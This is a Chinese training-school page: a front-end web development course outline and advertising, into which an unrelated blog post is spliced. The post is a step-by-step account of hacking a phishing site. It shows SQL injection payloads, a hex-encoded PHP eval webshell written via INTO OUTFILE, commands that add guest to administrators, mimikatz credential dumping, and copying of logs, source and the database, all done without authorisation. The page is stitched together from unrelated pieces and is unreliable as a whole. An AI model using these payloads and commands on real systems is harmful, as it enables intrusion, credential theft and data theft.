课程简介
掌握能力:掌握PC端网页开发,掌握移动端网页开发,掌握HTML5CSS3新特性
胜任职位:Web前端开发工程师、前端页面布局与重构工程师
薪资水平:4K-6K
实战项目:《Ghost 开源博客平台页面的响应式布局》《足球圈M站布局》
掌握能力:1.掌握原生JavaScript交互功能开发、掌握面向对象进阶与ES5/6/7/8/9/10应用、掌握JavaScript工具库开发
2.掌握jQuery经典交互特效开发、掌握Echarts数据可视化、掌握PHP+MySQL后端基础
3.掌握前端工程化与模块化应用
胜任职位:Web前端工程师、高级Web前端工程师、网站开发工程师、移动前端开发工程师
薪资水平:6K-10K
实战项目:《小米商城全栈开发》
1.掌握Node.js基础、HTTP服务搭建、接口编写
2.掌握VUE基础及高级内容、掌握SPA开发、掌握vuex状态管理
3.掌握React基础及高级内容、掌握SPA开发、掌握redux状态管理
4.掌握dva 和umijs在企业开发中的应用
5.掌握小程序基础及高级应用
6.掌握uni-app混合框架及多端小程序应用
解决数据处理场景中的各种算法及逻辑问题
解决场景网络协议下的优化调试问题
解决数据处理场景中的各种算法及逻辑问题
解决场景网络协议下的优化调试问题
Anguar基础与实战、Ionic基础与实战、微信公众号开发、各类混合应用开发、React-Native开发、Flutter开发、大数据课可视化D3.js、桌面APP开发Electron
1、项目需求分析与交互设计
2、前后端及移动端流行工具、框架与库的企业项目深度应用实战
3、JavaScript框架设计
4、移动端组件库设计
5、项目架构与产品选型
6、大厂的项目开发流程、项目测试、部署与发布实践
7、项目安全、性能与可用性实战
8、如何与兄弟部门及项目团队各方密切合作与有效沟通
前端从这几年开始受到重视,但是由于前端开发鱼龙混杂,技术参差不齐,导致大家对前端行业开始有所疑问,求职人员抱怨前端人数太多,HR 抱怨合适的前端为什么这么难找! 但从各个招聘网站上的数据来看,前端需要的人员仍然是非常庞大的(大家可以自己搜索前端职位更具有可信度),2021 年,前端仍然是一个非常火爆的专业,就如我们所见,任何技术实现的结果都需要展示给用户,而这些展示都是需要前端来进行完成,前端也不再是全部依赖于浏览器,而使用 native实现的原生 App 也是越来越多公司的选择,前端开发工程师、小程序开发工程师、高级前端开发工程师、前端架构师、高级前端架构师都是可以选择的执业...
为什么来WEB学校学Web前端的女生更多?在其他培训机构,女生学程序的比例仅占20%, 但是在WEB学校时代这个比例会上升到48%, 事实证明WEB学校Web前端课程设置更科学合理, 讲师授课更深入浅出, 项目实训更能提升实战 能力, 0基础学员学习4个月就能胜任大前端工作。企业最需要的技术, 在这里都能学到。HTML5、交互、JS动效、Web APP轻应用,4项核心技能让你成为全栈式前端人才。大前端作为架构师级程序员,需要掌握产品的全局观。一款APP轻应用的全局开发, 让学员在实战中学习产品布局。
前段时间加了个设计群,某人说朋友被骗钱在群里吐了两天苦水,原先真不打算管这事,没太多时间管闲事.无奈昨晚下了场大雨,没办法出门跑步,一时技痒就顺道把钓鱼站黑了顺道把网站日志跟服务器登陆日志打包出来.所以有了这篇文章记录一下过程.
0x01 溯源准备
1.1 开始
看到链接下看到后缀php?uid=,初步判断应该是php+mysql的网站..复制链接到电脑浏览器打开后下意识职业病uid=87’
1.2 爆出路径,可能存在sql注入
得到路径D:\xxxxx\zz\index.php,加上header头数据初步判断得出是Windows+Apache+Php+Mysql的网站,能爆路径很概率会有Sql注入,我们先记录下来路径是D:\xxxxx\http://www.*/zz/index.php?zt=1&uid=87 xor 1=1 //返回正常http://www.*/zz/index.php?zt=1&uid=87 xor 1=2 //返回错误
1.3 有sql注入
本来想掏出SQLMAP一把梭,结果sqlmap居然没注入出来..可能是我的操作有问题..只能手工注入了.
1.4 猜字段数目
当尝试注入语句字段个数为26返回正确,27返回错误,说明字段数等于26.http://www.*/zz/index.php?zt=1&uid=87 order by 26 //返回正常http://www.*/zz/index.php?zt=1&uid=87 order by 27 //返回错误
1.5 联合查询语句,暴出可显示字段
http://www.x*/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26
1.6 暴出数据库用户、版本、库名和路径信息.
system_user() 系统用户名user() 用户名current_user当前用户名session_user()连接数据库的用户名database() 数据库名version() MYSQL 数据库版本load_file() MYSQL 读取本地文件的函数@@datadir 读取数据库路径@@basedir MYSQL 安装路径@@version_compile_os 操作系统http://www.*/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,user(),database(),7,8,version(),10,11,12, @@basedir,14,15,16,17,18,19,20,21,22,23,24,25,26
运气不错是root权限,不用大费周章跑去后台传马,直接写,记录信息root@localhost^^5.5.40^^xxxx^^D:/phpStudy/MySQL/
1.7 写入webshell
结合我们刚才爆出的网站路径D:\xxxxx\zz\ php一句话 去https://www.*/T-Hex/ 转成hex16进制加上0x 得出写入webhsell语句.http://www.x*/zz/index.php?zt=1&uid=87 xor 1=2 union select 1,2,3,4,0x3C3F706870206576616C28245F504F53545B2774657374275D293F3E,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile ‘D:/xxxxx/zz/weiho.php’
1.8 提升权限
连接上去看一下权限,Administrator..典型phpstudy安装完啥也不管直接把站丢上去的情况..还想着要不Mysql UDF或者MOF提权.这里接下来有两种做法,直接启用guest,添加密码以及管理员权限.第二种下个wce读取明文,以administrator的权限登陆.Ps:wce需要管理员或管理员以上的权限才可以,一般情况下配合本地提权exploit,但这里是Administrator.可以忽略掉要提权的操作.不过我们这里选前者,直接启用guest账号.先查看下对方在不在VPS里.状态:断开.query users //查看登陆用户名会话名 ID 状态空闲时间登录时间administrator 2 断开 1+21:09 2018/7/11 23:15et user guest /active:yes &net localgroup administrators guest /add & net user guest weiho4444@命令成功完成。
1.9 登陆远程桌面
nmap -sS -A -v -p- –open *我进来这服务器前用nmap大概扫了一下.有三个端口开放80,3306,3389.本来想爆破3306.telnet过去没到三秒结束会话,后面登陆才发现设置了IP.3389一般是远程桌面的端口.直接本地连过去就行了. 运行远程桌面mstsc
1.10 读取明文密码
mimikatz先下载回来,由于这VPS是x86系统所以运行x86的mimikatzPs:一定要是管理员权限才能运行.privilege::debugsekurlsa::logonpasswords
得到管理员administrator密码540cxxxxxx.把自己账号禁了,以管理员进去.
0x02 开始溯源
2.1 拷贝系统日志Security和System
C:\Windows\System32\winevt\Logs
2.2 Apache日志 error.log
“C:\Program Files\WinRAR\Rar.exe” a -k -r -s -m1 D:\xxxxxx\error.rar D:\phpStudy\Apache\logs
2.3 打包网站源码
“C:\Program Files\WinRAR\Rar.exe” a -k -r -s -m1 D:\xxxxxx\1.rar D:\xxxxx\
2.4 导出mysql数据库
mysqldump -uroot -proot123456 dbname > D:\xxxxx\dbname.sql
0x03 后话
把数据打包后,让那哥们交民警结果人家民警同志不信..说我数据可能伪造.我说让民警直接联系我吧,然后blabla不了了之,就立了案.OMG.大写服气.后面让玄道转交给江苏的网警同志.今天(7.14)记录一下昨晚(7.13)的大概过程.中间省略了一些不太必要的过程.后续可以做的事,分析apache以及系统日志.做个后门记录远程桌面访问的IP,以及iframe之类的引用插入后台相关地址记录.查看web服务器日志得到对应IP.
0x04 参考资料与工具
一个PHP+Mysql手工注入例子
Mysql注入方式
Hex编码解码
使用mimikatz_trunk获取计算机密码
免费为您提供优质的机构
稍后会有专业老师给您回电,请保持电话畅通
易达招生网@版权所有 豫ICP备12014175号
本站文章由用户自行上传发布,如有侵权内容请及时联系我们删除。